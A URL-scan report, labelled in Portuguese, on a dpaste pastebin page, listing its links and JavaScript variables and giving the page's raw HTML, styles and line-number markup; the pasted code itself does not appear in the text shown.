- ID da verificação
- 89edb22e-90d1-4cc1-aef7-eebfea8ea1d9Concluído
- URL enviado:
- https://dpaste.com/2HFU6JHE6
- Relatório concluído:
Links · 2 encontrado(s)
Os links de saída identificados na página
Link | Texto |
---|---|
https://server.ethicalads.io/proxy/click/8045/3c68f43f-4650-433d-b3c3-5b781b8776d4/ | Develop and launch modern apps with MongoDB Atlas, a resilient data platform. |
https://www.ethicalads.io/advertisers/?ref=ea-text | Ads by EthicalAds |
Variáveis JavaScript · 22 encontrada(s)
Variáveis JavaScript globais carregadas no objeto janela de uma página são variáveis declaradas fora das funções e acessíveis de qualquer lugar no código dentro do escopo atual
Nome | Tipo |
---|---|
0 | object |
1 | object |
2 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
htmx | object |
$ | function |
jQuery | function |
key | function |
Mensagens de registro do console · 0 encontrada(s)
Mensagens registradas no console web
HTML
O corpo HTML bruto da página
<!DOCTYPE html><html lang="en"><head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="google-site-verification" content="m41-YA2o4kXb32RmyuClA1zAXZCyaGaDEUj1QIc5bmc">
<title>
dpaste: source code, by full_sourcecode
</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="dpaste.com is a pastebin site for easily sharing and storing code snippets. Syntax highlighting, clean interface, markup preview, quick sharing options.">
<meta name="keywords" content="dpaste, pastebin, snippets, programming, syntax highlighting, share code, programmer tools">
<link rel="apple-touch-icon" sizes="180x180" href="https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png">
<link rel="icon" type="image/x-icon" href="https://dpaste.b-cdn.net/static/pastebin/favicon.ico">
<link rel="manifest" href="https://dpaste.b-cdn.net/static/pastebin/site.webmanifest">
<link rel="me" href="https://fosstodon.org/@dpaste">
<link rel="stylesheet" href="https://dpaste.b-cdn.net/static/pastebin/css/normalize.css">
<link rel="stylesheet" href="https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css">
<link rel="stylesheet" href="https://dpaste.b-cdn.net/static/pastebin/css/main.css">
<link href="https://fonts.googleapis.com/css2?family=Fira+Sans:wght@400;700&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css?family=Fira+Mono" rel="stylesheet">
<script src="https://unpkg.com/[email protected]" integrity="sha384-Y7hw+L/jvKeWIRRkqWYfPcvVxHzVzn5REgzbawhxAuQGwX1XWe70vji+VSeHOThJ" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script defer="" src="https://media.ethicalads.io/media/client/ethicalads.min.js"></script>
<script>
function key(event, letter) {
return (event.charCode == letter.charCodeAt() || event.charCode == letter.charCodeAt() + 32)
}
</script>
<script>
function key(event, letter) {
return (event.charCode == letter.charCodeAt() || event.charCode == letter.charCodeAt() + 32)
}
function subview_redirect(path_end) {
let base = location.pathname;
// Drop extension unless we're previewing
if (path_end !== "-preview") { base = base.substring(0, base.lastIndexOf('.')) || base }
location.href = base + path_end;
}
function indicate_wrap() {
$("#softwrap_toggle").text("UNWRAP");
location.hash = "wrap";
}
function indicate_unwrap() {
$("#softwrap_toggle").text("SOFT WRAP");
location.hash = "";
}
function softwrap_toggle() {
$("pre").toggleClass("softwrap")
$(".linenodiv").toggle()
if ($("#softwrap_toggle").text() == "SOFT WRAP") {
indicate_wrap()
} else {
indicate_unwrap()
}
}
function mark_linked_line() {
$('.linemark').remove();
$('a[href="' + location.hash + '"]').after('<svg height="10" width="16" class="linemark"> <polygon points="3,0 15,4 3,9" style="fill:#99f" /></svg>');
}
function copy_to_clipboard() {
if (!navigator.clipboard) {
console.log("Clipboard API not available in this browser")
return
}
try {
// Next three lines: decode-entities hack (from https://stackoverflow.com/a/3700369)
var tmp = document.createElement('textarea')
tmp.innerHTML = $('#raw-content').html()
navigator.clipboard.writeText(tmp.value)
$('#copy-success').show()
} catch (err) {
console.error('Copying raw content failed: ', err)
}
}
$(document).ready(function() {
window.onhashchange = mark_linked_line
if (location.hash == "#wrap") {
softwrap_toggle();
indicate_wrap();
}
if (location.hash.indexOf("#line-") === 0) {
mark_linked_line();
}
$("#softwrap_toggle").click(softwrap_toggle);
$('#copy-button').click(copy_to_clipboard)
});
$(document).keypress(function(event) {
if (key(event, 'W')) { softwrap_toggle(); }
// For pastes only, not diffs
if (key(event, 'C')) { copy_to_clipboard() }
if (key(event, 'D')) { subview_redirect('/duplicate/') }
if (key(event, 'R')) { subview_redirect('.txt') }
});
$(document).keyup(function(event) {
if (event.keyCode == 8 || event.keyCode == 46) { subview_redirect('/delete/') }
});
</script>
<style>
pre { line-height: 125%; }
td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }
.highlight .hll { background-color: #ffffcc }
.highlight { background: #f8f8f8; }
.highlight .c { color: #3D7B7B; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #008000; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #9C6500 } /* Comment.Preproc */
.highlight .cpf { color: #3D7B7B; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #3D7B7B; font-style: italic } /* Comment.Single */
.highlight .cs { color: #3D7B7B; font-style: italic } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .ges { font-weight: bold; font-style: italic } /* Generic.EmphStrong */
.highlight .gr { color: #E40000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #008400 } /* Generic.Inserted */
.highlight .go { color: #717171 } /* Generic.Output */
.highlight .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #008000 } /* Keyword.Pseudo */
.highlight .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #B00040 } /* Keyword.Type */
.highlight .m { color: #666666 } /* Literal.Number */
.highlight .s { color: #BA2121 } /* Literal.String */
.highlight .na { color: #687822 } /* Name.Attribute */
.highlight .nb { color: #008000 } /* Name.Builtin */
.highlight .nc { color: #0000FF; font-weight: bold } /* Name.Class */
.highlight .no { color: #880000 } /* Name.Constant */
.highlight .nd { color: #AA22FF } /* Name.Decorator */
.highlight .ni { color: #717171; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #CB3F38; font-weight: bold } /* Name.Exception */
.highlight .nf { color: #0000FF } /* Name.Function */
.highlight .nl { color: #767600 } /* Name.Label */
.highlight .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #008000; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #19177C } /* Name.Variable */
.highlight .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #666666 } /* Literal.Number.Bin */
.highlight .mf { color: #666666 } /* Literal.Number.Float */
.highlight .mh { color: #666666 } /* Literal.Number.Hex */
.highlight .mi { color: #666666 } /* Literal.Number.Integer */
.highlight .mo { color: #666666 } /* Literal.Number.Oct */
.highlight .sa { color: #BA2121 } /* Literal.String.Affix */
.highlight .sb { color: #BA2121 } /* Literal.String.Backtick */
.highlight .sc { color: #BA2121 } /* Literal.String.Char */
.highlight .dl { color: #BA2121 } /* Literal.String.Delimiter */
.highlight .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #BA2121 } /* Literal.String.Double */
.highlight .se { color: #AA5D1F; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #BA2121 } /* Literal.String.Heredoc */
.highlight .si { color: #A45A77; font-weight: bold } /* Literal.String.Interpol */
.highlight .sx { color: #008000 } /* Literal.String.Other */
.highlight .sr { color: #A45A77 } /* Literal.String.Regex */
.highlight .s1 { color: #BA2121 } /* Literal.String.Single */
.highlight .ss { color: #19177C } /* Literal.String.Symbol */
.highlight .bp { color: #008000 } /* Name.Builtin.Pseudo */
.highlight .fm { color: #0000FF } /* Name.Function.Magic */
.highlight .vc { color: #19177C } /* Name.Variable.Class */
.highlight .vg { color: #19177C } /* Name.Variable.Global */
.highlight .vi { color: #19177C } /* Name.Variable.Instance */
.highlight .vm { color: #19177C } /* Name.Variable.Magic */
.highlight .il { color: #666666 } /* Literal.Number.Integer.Long */
.linenos { padding-right: 0 }
.softwrap { white-space: pre-wrap; }
h1 i { color: #888;}
td.code { padding-left: 0 }
#copy-success { color: #fff; font-weight: bold }
</style>
<link href="https://cdn.jsdelivr.net/npm/shareon@2/dist/shareon.min.css" rel="stylesheet">
<script src="https://cdn.jsdelivr.net/npm/shareon@2/dist/shareon.iife.js" type="text/javascript" defer="" init=""></script>
<style>[data-ea-publisher].loaded,[data-ea-type].loaded{font-size:14px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-weight:normal;font-style:normal;letter-spacing:0px;vertical-align:baseline;line-height:1.3em}[data-ea-publisher].loaded a,[data-ea-type].loaded a{text-decoration:none}[data-ea-publisher].loaded .ea-pixel,[data-ea-type].loaded .ea-pixel{display:none}[data-ea-publisher].loaded .ea-content,[data-ea-type].loaded .ea-content{margin:1em 1em .5em 1em;padding:1em;background:rgba(0,0,0,.03);color:#505050}[data-ea-publisher].loaded .ea-content a:link,[data-ea-type].loaded .ea-content a:link{color:#505050}[data-ea-publisher].loaded .ea-content a:visited,[data-ea-type].loaded .ea-content a:visited{color:#505050}[data-ea-publisher].loaded .ea-content a:hover,[data-ea-type].loaded .ea-content a:hover{color:#373737}[data-ea-publisher].loaded .ea-content a:active,[data-ea-type].loaded .ea-content a:active{color:#373737}[data-ea-publisher].loaded .ea-content a strong,[data-ea-publisher].loaded .ea-content a b,[data-ea-type].loaded .ea-content a strong,[data-ea-type].loaded .ea-content a b{color:#088cdb}[data-ea-publisher].loaded .ea-callout a:link,[data-ea-type].loaded .ea-callout a:link{color:#6a6a6a}[data-ea-publisher].loaded .ea-callout a:visited,[data-ea-type].loaded .ea-callout a:visited{color:#6a6a6a}[data-ea-publisher].loaded .ea-callout a:hover,[data-ea-type].loaded .ea-callout a:hover{color:#505050}[data-ea-publisher].loaded .ea-callout a:active,[data-ea-type].loaded .ea-callout a:active{color:#505050}[data-ea-publisher].loaded .ea-callout a strong,[data-ea-publisher].loaded .ea-callout a b,[data-ea-type].loaded .ea-callout a strong,[data-ea-type].loaded .ea-callout a b{color:#088cdb}[data-ea-publisher].loaded .ea-callout a,[data-ea-type].loaded .ea-callout a{font-size:.8em}[data-ea-publisher].loaded .ea-domain,[data-ea-type].loaded .ea-domain{margin-top:.75em;font-size:.8em;text-align:center;color:#9d9d9d}[data-ea-publisher].loaded.dark .ea-content,[data-ea-type].loaded.dark .ea-content{background:rgba(255,255,255,.05);color:#dcdcdc}[data-ea-publisher].loaded.dark .ea-content a:link,[data-ea-type].loaded.dark .ea-content a:link{color:#dcdcdc}[data-ea-publisher].loaded.dark .ea-content a:visited,[data-ea-type].loaded.dark .ea-content a:visited{color:#dcdcdc}[data-ea-publisher].loaded.dark .ea-content a:hover,[data-ea-type].loaded.dark .ea-content a:hover{color:#f6f6f6}[data-ea-publisher].loaded.dark .ea-content a:active,[data-ea-type].loaded.dark .ea-content a:active{color:#f6f6f6}[data-ea-publisher].loaded.dark .ea-content a strong,[data-ea-publisher].loaded.dark .ea-content a b,[data-ea-type].loaded.dark .ea-content a strong,[data-ea-type].loaded.dark .ea-content a b{color:#50baf9}[data-ea-publisher].loaded.dark .ea-callout a:link,[data-ea-type].loaded.dark .ea-callout a:link{color:#c3c3c3}[data-ea-publisher].loaded.dark .ea-callout a:visited,[data-ea-type].loaded.dark .ea-callout a:visited{color:#c3c3c3}[data-ea-publisher].loaded.dark .ea-callout a:hover,[data-ea-type].loaded.dark .ea-callout a:hover{color:#dcdcdc}[data-ea-publisher].loaded.dark .ea-callout a:active,[data-ea-type].loaded.dark .ea-callout a:active{color:#dcdcdc}[data-ea-publisher].loaded.dark .ea-callout a strong,[data-ea-publisher].loaded.dark .ea-callout a b,[data-ea-type].loaded.dark .ea-callout a strong,[data-ea-type].loaded.dark .ea-callout a b{color:#50baf9}[data-ea-publisher].loaded.dark .ea-domain,[data-ea-type].loaded.dark .ea-domain{color:#909090}@media(prefers-color-scheme: dark){[data-ea-publisher].loaded.adaptive .ea-content,[data-ea-type].loaded.adaptive .ea-content{background:rgba(255,255,255,.05);color:#dcdcdc}[data-ea-publisher].loaded.adaptive .ea-content a:link,[data-ea-type].loaded.adaptive .ea-content a:link{color:#dcdcdc}[data-ea-publisher].loaded.adaptive .ea-content a:visited,[data-ea-type].loaded.adaptive .ea-content a:visited{color:#dcdcdc}[data-ea-publisher].loaded.adaptive .ea-content a:hover,[data-ea-type].loaded.adaptive .ea-content a:hover{color:#f6f6f6}[data-ea-publisher].loaded.adaptive .ea-content a:active,[data-ea-type].loaded.adaptive .ea-content a:active{color:#f6f6f6}[data-ea-publisher].loaded.adaptive .ea-content a strong,[data-ea-publisher].loaded.adaptive .ea-content a b,[data-ea-type].loaded.adaptive .ea-content a strong,[data-ea-type].loaded.adaptive .ea-content a b{color:#50baf9}[data-ea-publisher].loaded.adaptive .ea-callout a:link,[data-ea-type].loaded.adaptive .ea-callout a:link{color:#c3c3c3}[data-ea-publisher].loaded.adaptive .ea-callout a:visited,[data-ea-type].loaded.adaptive .ea-callout a:visited{color:#c3c3c3}[data-ea-publisher].loaded.adaptive .ea-callout a:hover,[data-ea-type].loaded.adaptive .ea-callout a:hover{color:#dcdcdc}[data-ea-publisher].loaded.adaptive .ea-callout a:active,[data-ea-type].loaded.adaptive .ea-callout a:active{color:#dcdcdc}[data-ea-publisher].loaded.adaptive .ea-callout a strong,[data-ea-publisher].loaded.adaptive .ea-callout a b,[data-ea-type].loaded.adaptive .ea-callout a strong,[data-ea-type].loaded.adaptive .ea-callout a b{color:#50baf9}[data-ea-publisher].loaded.adaptive .ea-domain,[data-ea-type].loaded.adaptive .ea-domain{color:#909090}}[data-ea-publisher].loaded .ea-content,[data-ea-type].loaded .ea-content{border:0px;border-radius:3px;box-shadow:0px 2px 3px rgba(0,0,0,.15)}[data-ea-publisher].loaded.raised .ea-content,[data-ea-type].loaded.raised .ea-content{border:0px;border-radius:3px;box-shadow:0px 2px 3px rgba(0,0,0,.15)}[data-ea-publisher].loaded.bordered .ea-content,[data-ea-type].loaded.bordered .ea-content{border:1px solid rgba(0,0,0,.04);border-radius:3px;box-shadow:none}[data-ea-publisher].loaded.bordered.dark .ea-content,[data-ea-type].loaded.bordered.dark .ea-content{border:1px solid rgba(255,255,255,.07)}@media(prefers-color-scheme: dark){[data-ea-publisher].loaded.bordered.adaptive .ea-content,[data-ea-type].loaded.bordered.adaptive .ea-content{border:1px solid rgba(255,255,255,.07)}}[data-ea-publisher].loaded.flat .ea-content,[data-ea-type].loaded.flat .ea-content{border:0px;border-radius:3px;box-shadow:none}[data-ea-type=image].loaded,[data-ea-publisher]:not([data-ea-type]).loaded,.ea-type-image{display:inline-block}[data-ea-type=image].loaded .ea-content,[data-ea-publisher]:not([data-ea-type]).loaded .ea-content,.ea-type-image .ea-content{max-width:180px;overflow:auto;text-align:center}[data-ea-type=image].loaded .ea-content>a>img,[data-ea-publisher]:not([data-ea-type]).loaded .ea-content>a>img,.ea-type-image .ea-content>a>img{width:120px;height:90px;display:inline-block}[data-ea-type=image].loaded .ea-content>.ea-text,[data-ea-publisher]:not([data-ea-type]).loaded .ea-content>.ea-text,.ea-type-image .ea-content>.ea-text{margin-top:1em;font-size:1em;text-align:center}[data-ea-type=image].loaded .ea-callout,[data-ea-publisher]:not([data-ea-type]).loaded .ea-callout,.ea-type-image .ea-callout{max-width:180px;margin:0em 1em 1em 1em;padding-left:1em;padding-right:1em;font-style:italic;text-align:right}[data-ea-type=image].loaded.horizontal .ea-content,[data-ea-publisher]:not([data-ea-type]).loaded.horizontal .ea-content,.ea-type-image.horizontal .ea-content{max-width:320px}[data-ea-type=image].loaded.horizontal .ea-content>a>img,[data-ea-publisher]:not([data-ea-type]).loaded.horizontal .ea-content>a>img,.ea-type-image.horizontal .ea-content>a>img{float:left;margin-right:1em}[data-ea-type=image].loaded.horizontal .ea-content .ea-text,[data-ea-publisher]:not([data-ea-type]).loaded.horizontal .ea-content .ea-text,.ea-type-image.horizontal .ea-content .ea-text{margin-top:0em;text-align:left;overflow:auto}[data-ea-type=image].loaded.horizontal .ea-callout,[data-ea-publisher]:not([data-ea-type]).loaded.horizontal .ea-callout,.ea-type-image.horizontal .ea-callout{max-width:320px;text-align:right}[data-ea-type=text].loaded,.ea-type-text{font-size:14px}[data-ea-type=text].loaded .ea-content,.ea-type-text .ea-content{text-align:left}[data-ea-type=text].loaded .ea-callout,.ea-type-text .ea-callout{margin:.5em 1em 1em 1em;padding-left:1em;padding-right:1em;text-align:right;font-style:italic}[data-ea-style=stickybox].loaded{position:fixed;bottom:20px;right:20px;z-index:100}[data-ea-style=stickybox].loaded .ea-type-image .ea-stickybox-hide{cursor:pointer;position:absolute;top:.75em;right:.75em;background-color:#fefefe;border:1px solid #088cdb;border-radius:50%;color:#088cdb;font-size:1em;text-align:center;height:1.5em;width:1.5em;line-height:1.4}@media(max-width: 1300px){[data-ea-style=stickybox].loaded{position:static;bottom:0;right:0;margin:auto;text-align:center}[data-ea-style=stickybox].loaded .ea-stickybox-hide{display:none}}@media(min-width: 1301px){[data-ea-style=stickybox].loaded .ea-type-image .ea-content{background:#dcdcdc}[data-ea-style=stickybox].loaded.dark .ea-type-image .ea-content{background:#505050}}@media(min-width: 1301px)and (prefers-color-scheme: dark){[data-ea-style=stickybox].loaded.adaptive .ea-type-image .ea-content{background:#505050}}[data-ea-style=fixedfooter].loaded{position:fixed;bottom:0;left:0;z-index:200;width:100%;max-width:100%}[data-ea-style=fixedfooter].loaded .ea-type-text{width:100%;max-width:100%;display:flex;z-index:200;background:#dcdcdc}[data-ea-style=fixedfooter].loaded .ea-type-text .ea-content{border:0px;border-radius:3px;box-shadow:none}[data-ea-style=fixedfooter].loaded .ea-type-text .ea-content{background-color:inherit;max-width:100%;margin:0;padding:1em;flex:auto}[data-ea-style=fixedfooter].loaded .ea-type-text .ea-callout{max-width:100%;margin:0;padding:1em;flex:initial}@media(max-width: 576px){[data-ea-style=fixedfooter].loaded .ea-type-text .ea-callout{display:none}}[data-ea-style=fixedfooter].loaded .ea-type-text .ea-fixedfooter-hide{cursor:pointer;color:#505050;padding:1em;flex:initial;margin:auto 0}[data-ea-style=fixedfooter].loaded .ea-type-text .ea-fixedfooter-hide span{padding:.25em;font-size:.8em;font-weight:bold;border:.15em solid #505050;border-radius:.5em;white-space:nowrap}[data-ea-style=fixedfooter].loaded.dark .ea-type-text{background:#505050}[data-ea-style=fixedfooter].loaded.dark .ea-type-text .ea-fixedfooter-hide span{color:#dcdcdc;border-color:#dcdcdc}@media(prefers-color-scheme: dark){[data-ea-style=fixedfooter].loaded.adaptive .ea-type-text{background:#505050}[data-ea-style=fixedfooter].loaded.adaptive .ea-type-text .ea-fixedfooter-hide span{color:#dcdcdc;border-color:#dcdcdc}}</style><script src="https://server.ethicalads.io/api/v1/decision/?publisher=dpaste&ad_types=text-v1&div_ids=ad_1733132844395_638161&callback=ad_1733132844395_638161&keywords=programming%7CText+output%7Cethereum&campaign_types=paid%7Cpublisher-house%7Ccommunity%7Chouse&format=jsonp&client_version=1.21.0&placement_index=0&url=https%3A%2F%2Fdpaste.com%2F2HFU6JHE6" type="text/javascript" async=""></script><style> .htmx-indicator{opacity:0} .htmx-request .htmx-indicator{opacity:1; transition: opacity 200ms ease-in;} .htmx-request.htmx-indicator{opacity:1; transition: opacity 200ms ease-in;} </style><link id="freshworks-frame-styles" rel="stylesheet" href="https://widget.freshworks.com/widgetBase/static/media/frame.d7ae132c.css"></head>
<body hx-on:keydown="var path=window.location.pathname; if ((event.key=='n' || event.key=='N') && path && path !== '/' && !path.includes('/duplicate/') && !path.includes('/dashboard/') && !path.includes('/accounts/') && !path.includes('/properties/')) { window.location.href = '/'; }">
<div id="container">
<div class="topbuttons">
<a href="/accounts/login/" title="Personal dashboard, preferences, API token" class="button"><b>Sign in</b></a>
<a href="/" title="Create a new paste (shortcut: 'N')" class=" button">New</a>
<a href="/api/v2/" title="Paste creation API, with code samples" class=" button">API</a>
<a href="/help/" title="Usage tips, shortcuts" class=" button">Help</a>
<a href="/about/" title="Updates, stats, backstory" class=" button">About</a>
</div>
<h1>source code</h1>
<div class="row">
22.4 KB of <strong>Text output</strong>
<br>
Created 3 days, 16 hours ago
by <a href="/profile/16860/">full_sourcecode</a>
—
expires in 362 days
<br>
Viewed
1,334 times
<span style="display:none">
<br>
https://dpaste.com/2HFU6JHE6</span>
</div>
<div class="row actionbuttons">
<a id="copy-button" title="Copy raw content (shortcut: 'C'">COPY TO CLIPBOARD<span id="copy-success" hidden=""> 📋</span></a>
<a id="softwrap_toggle" title="Toggle visual wrap of long lines (shortcut: 'W')">SOFT WRAP</a>
<a href="/2HFU6JHE6.txt" title="Plaintext version (shortcut: 'R')">RAW TEXT</a>
<a href="/2HFU6JHE6/duplicate/" title="Make a new paste based on this one (shortcut: 'D')">DUPLICATE</a>
<a href="/2HFU6JHE6/diff" title="Diff this paste against another one">DIFF</a>
</div>
<div class="highlight"><table class="highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre><span class="normal"><a href="#line-1"> 1</a></span>
<span class="normal"><a href="#line-2"> 2</a></span>
<span class="normal"><a href="#line-3"> 3</a></span>
<span class="normal"><a href="#line-4"> 4</a></span>
<span class="normal"><a href="#line-5"> 5</a></span>
<span class="normal"><a href="#line-6"> 6</a></span>
<span class="normal"><a href="#line-7"> 7</a></span>
<span class="normal"><a href="#line-8"> 8</a></span>
<span class="normal"><a href="#line-9"> 9</a></span>
<span class="normal"><a href="#line-10"> 10</a></span>
<span class="normal"><a href="#line-11"> 11</a></span>
<span class="normal"><a href="#line-12"> 12</a></span>
<span class="normal"><a href="#line-13"> 13</a></span>
<span class="normal"><a href="#line-14"> 14</a></span>
<span class="normal"><a href="#line-15"> 15</a></span>
<span class="normal"><a href="#line-16"> 16</a></span>
<span class="normal"><a href="#line-17"> 17</a></span>
<span class="normal"><a href="#line-18"> 18</a></span>
<span class="normal"><a href="#line-19"> 19</a></span>
<span class="normal"><a href="#line-20"> 20</a></span>
<span class="normal"><a href="#line-21"> 21</a></span>
<span class="normal"><a href="#line-22"> 22</a></span>
<span class="normal"><a href="#line-23"> 23</a></span>
<span class="normal"><a href="#line-24"> 24</a></span>
<span class="normal"><a href="#line-25"> 25</a></span>
<span class="normal"><a href="#line-26"> 26</a></span>
<span class="normal"><a href="#line-27"> 27</a></span>
<span class="normal"><a href="#line-28"> 28</a></span>
<span class="normal"><a href="#line-29"> 29</a></span>
<span class="normal"><a href="#line-30"> 30</a></span>
<span class="normal"><a href="#line-31"> 31</a></span>
<span class="normal"><a href="#line-32"> 32</a></span>
<span class="normal"><a href="#line-33"> 33</a></span>
<span class="normal"><a href="#line-34"> 34</a></span>
<span class="normal"><a href="#line-35"> 35</a></span>
<span class="normal"><a href="#line-36"> 36</a></span>
<span class="normal"><a href="#line-37"> 37</a></span>
<span class="normal"><a href="#line-38"> 38</a></span>
<span class="normal"><a href="#line-39"> 39</a></span>
<span class="normal"><a href="#line-40"> 40</a></span>
<span class="normal"><a href="#line-41"> 41</a></span>
<span class="normal"><a href="#line-42"> 42</a></span>
<span class="normal"><a href="#line-43"> 43</a></span>
<span class="normal"><a href="#line-44"> 44</a></span>
<span class="normal"><a href="#line-45"> 45</a></span>
<span class="normal"><a href="#line-46"> 46</a></span>
<span class="normal"><a href="#line-47"> 47</a></span>
<span class="normal"><a href="#line-48"> 48</a></span>
<span class="normal"><a href="#line-49"> 49</a></span>
<span class="normal"><a href="#line-50"> 50</a></span>
<span class="normal"><a href="#line-51"> 51</a></span>
<span class="normal"><a href="#line-52"> 52</a></span>
<span class="normal"><a href="#line-53"> 53</a></span>
<span class="normal"><a href="#line-54"> 54</a></span>
<span class="normal"><a href="#line-55"> 55</a></span>
<span class="normal"><a href="#line-56"> 56</a></span>
<span class="normal"><a href="#line-57"> 57</a></span>
<span class="normal"><a href="#line-58"> 58</a></span>
<span class="normal"><a href="#line-59"> 59</a></span>
<span class="normal"><a href="#line-60"> 60</a></span>
<span class="normal"><a href="#line-61"> 61</a></span>
<span class="normal"><a href="#line-62"> 62</a></span>
<span class="normal"><a href="#line-63"> 63</a></span>
<span class="normal"><a href="#line-64"> 64</a></span>
<span class="normal"><a href="#line-65"> 65</a></span>
<span class="normal"><a href="#line-66"> 66</a></span>
<span class="normal"><a href="#line-67"> 67</a></span>
<span class="normal"><a href="#line-68"> 68</a></span>
<span class="normal"><a href="#line-69"> 69</a></span>
<span class="normal"><a href="#line-70"> 70</a></span>
<span class="normal"><a href="#line-71"> 71</a></span>
<span class="normal"><a href="#line-72"> 72</a></span>
<span class="normal"><a href="#line-73"> 73</a></span>
<span class="normal"><a href="#line-74"> 74</a></span>
<span class="normal"><a href="#line-75"> 75</a></span>
<span class="normal"><a href="#line-76"> 76</a></span>
<span class="normal"><a href="#line-77"> 77</a></span>
<span class="normal"><a href="#line-78"> 78</a></span>
<span class="normal"><a href="#line-79"> 79</a></span>
<span class="normal"><a href="#line-80"> 80</a></span>
<span class="normal"><a href="#line-81"> 81</a></span>
<span class="normal"><a href="#line-82"> 82</a></span>
<span class="normal"><a href="#line-83"> 83</a></span>
<span class="normal"><a href="#line-84"> 84</a></span>
<span class="normal"><a href="#line-85"> 85</a></span>
<span class="normal"><a href="#line-86"> 86</a></span>
<span class="normal"><a href="#line-87"> 87</a></span>
<span class="normal"><a href="#line-88"> 88</a></span>
<span class="normal"><a href="#line-89"> 89</a></span>
<span class="normal"><a href="#line-90"> 90</a></span>
<span class="normal"><a href="#line-91"> 91</a></span>
<span class="normal"><a href="#line-92"> 92</a></span>
<span class="normal"><a href="#line-93"> 93</a></span>
<span class="normal"><a href="#line-94"> 94</a></span>
<span class="normal"><a href="#line-95"> 95</a></span>
<span class="normal"><a href="#line-96"> 96</a></span>
<span class="normal"><a href="#line-97"> 97</a></span>
<span class="normal"><a href="#line-98"> 98</a></span>
<span class="normal"><a href="#line-99"> 99</a></span>
<span class="normal"><a href="#line-100">100</a></span>
<span class="normal"><a href="#line-101">101</a></span>
<span class="normal"><a href="#line-102">102</a></span>
<span class="normal"><a href="#line-103">103</a></span>
<span class="normal"><a href="#line-104">104</a></span>
<span class="normal"><a href="#line-105">105</a></span>
<span class="normal"><a href="#line-106">106</a></span>
<span class="normal"><a href="#line-107">107</a></span>
<span class="normal"><a href="#line-108">108</a></span>
<span class="normal"><a href="#line-109">109</a></span>
<span class="normal"><a href="#line-110">110</a></span>
<span class="normal"><a href="#line-111">111</a></span>
<span class="normal"><a href="#line-112">112</a></span>
<span class="normal"><a href="#line-113">113</a></span>
<span class="normal"><a href="#line-114">114</a></span>
<span class="normal"><a href="#line-115">115</a></span>
<span class="normal"><a href="#line-116">116</a></span>
<span class="normal"><a href="#line-117">117</a></span>
<span class="normal"><a href="#line-118">118</a></span>
<span class="normal"><a href="#line-119">119</a></span>
<span class="normal"><a href="#line-120">120</a></span>
<span class="normal"><a href="#line-121">121</a></span>
<span class="normal"><a href="#line-122">122</a></span>
<span class="normal"><a href="#line-123">123</a></span>
<span class="normal"><a href="#line-124">124</a></span>
<span class="normal"><a href="#line-125">125</a></span>
<span class="normal"><a href="#line-126">126</a></span>
<span class="normal"><a href="#line-127">127</a></span>
<span class="normal"><a href="#line-128">128</a></span>
<span class="normal"><a href="#line-129">129</a></span>
<span class="normal"><a href="#line-130">130</a></span>
<span class="normal"><a href="#line-131">131</a></span>
<span class="normal"><a href="#line-132">132</a></span>
<span class="normal"><a href="#line-133">133</a></span>
<span class="normal"><a href="#line-134">134</a></span>
<span class="normal"><a href="#line-135">135</a></span>
<span class="normal"><a href="#line-136">136</a></span>
<span class="normal"><a href="#line-137">137</a></span>
<span class="normal"><a href="#line-138">138</a></span>
<span class="normal"><a href="#line-139">139</a></span>
<span class="normal"><a href="#line-140">140</a></span>
<span class="normal"><a href="#line-141">141</a></span>
<span class="normal"><a href="#line-142">142</a></span>
<span class="normal"><a href="#line-143">143</a></span>
<span class="normal"><a href="#line-144">144</a></span>
<span class="normal"><a href="#line-145">145</a></span>
<span class="normal"><a href="#line-146">146</a></span>
<span class="normal"><a href="#line-147">147</a></span>
<span class="normal"><a href="#line-148">148</a></span>
